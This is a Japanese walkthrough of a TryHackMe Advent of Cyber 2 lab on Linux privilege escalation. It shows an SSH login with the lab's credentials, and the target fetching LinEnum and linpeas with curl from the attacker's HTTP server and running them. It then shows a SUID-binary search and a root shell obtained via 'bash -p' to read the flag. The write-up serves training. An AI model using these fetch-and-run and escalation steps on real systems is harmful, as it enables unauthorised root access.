本稿では、TryHackMeにて提供されている「Advent of Cyber 2」ルームに関する攻略方法(Walkthrough)について検証します。
「Advent of Cyber 2」は「free room」(無料)で提供されています。購読を必要とせずに仮想マシンを「展開(Deploy)」することができます。
『Advent of Cyber 2』のWalkthroughインデックスを「[TryHackMe] Advent of Cyber 2に参加してみた」にて公開しました。
[Day 11] Networking: The Rogue Gnome
ストーリー
これだ!--エルフ・McEagerが待ち望んでいた瞬間です。彼が「Day 8 - What's Under the Christmas Tree?」で望んだ
Nmapコースの最終試験です。これまでの苦労が報われたようだ...。「成功!」 エルフ・McEagerは叫んだ。「エクスプロイトがうまくいった! Yippeee!」エルフ・McEagerは、ターゲットから自身のコンピュータに対するリバースシェルの確立に成功しました。彼はほとんど知りませんでした、本当の試験はこれからなのです...。試験の最終段階では、エルフ・McEagerの権限を昇格させる必要があります。彼は
Nmapのチートシートの勉強に時間を費やしてきたので、今は頭が真っ白になっています...。エルフ・McEagerを助けてあげてください。善人になるためには、まず悪人にならなければならないこともある...。(To be the good guy, sometimes you gotta be the bad guy first...)
Day 11 - #1.
What type of privilege escalation involves using a user account to execute commands as an administrator?
- Horizontal な特権昇格
- Vertical な特権昇格
Day 11 - #2.
What is the name of the file that contains a list of users who are a part of the
sudogroup?
kali@kali:~$ ls -l /etc/sudoers
-r--r----- 1 root root 669 Jul 12 11:52 /etc/sudoers
Day 11 - #3.
Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP
Input the following password when prompted: aoc2020
kali@kali:~$ ssh cmnatic@10.10.178.95
The authenticity of host '10.10.178.95 (10.10.178.95)' can't be established.
ECDSA key fingerprint is SHA256:Epte0uGyoBmg5Gb9zRw9f26JYUHv72UFd1VVNHcItUQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.178.95' (ECDSA) to the list of known hosts.
cmnatic@10.10.178.95's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Dec 12 01:25:04 UTC 2020
System load: 0.0 Processes: 92
Usage of /: 27.8% of 14.70GB Users logged in: 0
Memory usage: 16% IP address for eth0: 10.10.178.95
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
68 packages can be updated.
0 updates are security updates.
Last login: Wed Dec 9 15:49:32 2020
-bash-4.4$
Day 11 - #4.
Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
You may find uploading some of the enumeration scripts that were used during today's task to be useful.
kali@kali:~/OffsecVM$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.178.95 - - [11/Dec/2020 20:37:30] "GET /LinEmu.sh HTTP/1.1" 200 -
#EndOfScript-bash-4.4$ curl http://10.11.19.198:8080/LinEmu.sh -o LinEmu.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 46630 100 46630 0 0 42390 0 0:00:01 0:00:01 --:--:-- 42390
-bash-4.4$
-bash-4.4$ chmod +x LinEmu.sh
-bash-4.4$ ./LinEmu.sh
-bash-4.4$ curl http://10.11.19.198:8080/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 228k 100 228k 0 0 100k 0 0:00:02 0:00:02 --:--:-- 100k
-bash-4.4$ chmod +x linpeas.sh
-bash-4.4$ ./linpeas.sh
-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
-bash-4.4$
Day 11 - #5.
Use this executable to launch a system shell as root.
What are the contents of the file located at /root/flag.txt?
-bash-4.4$ whoami
cmnatic
-bash-4.4$ bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/flag.txt
thm{2fb1{BLOCKED}6592}
参考になるTryHackMeのルーム
Walkthrough
- BRYAN WENDT, TryHackMe – Advent of Cyber 2 – Day 11 – Walkthrough
- NEERANJAN MURUGAN, Advent of Cyber 2 ~ Try Hack Me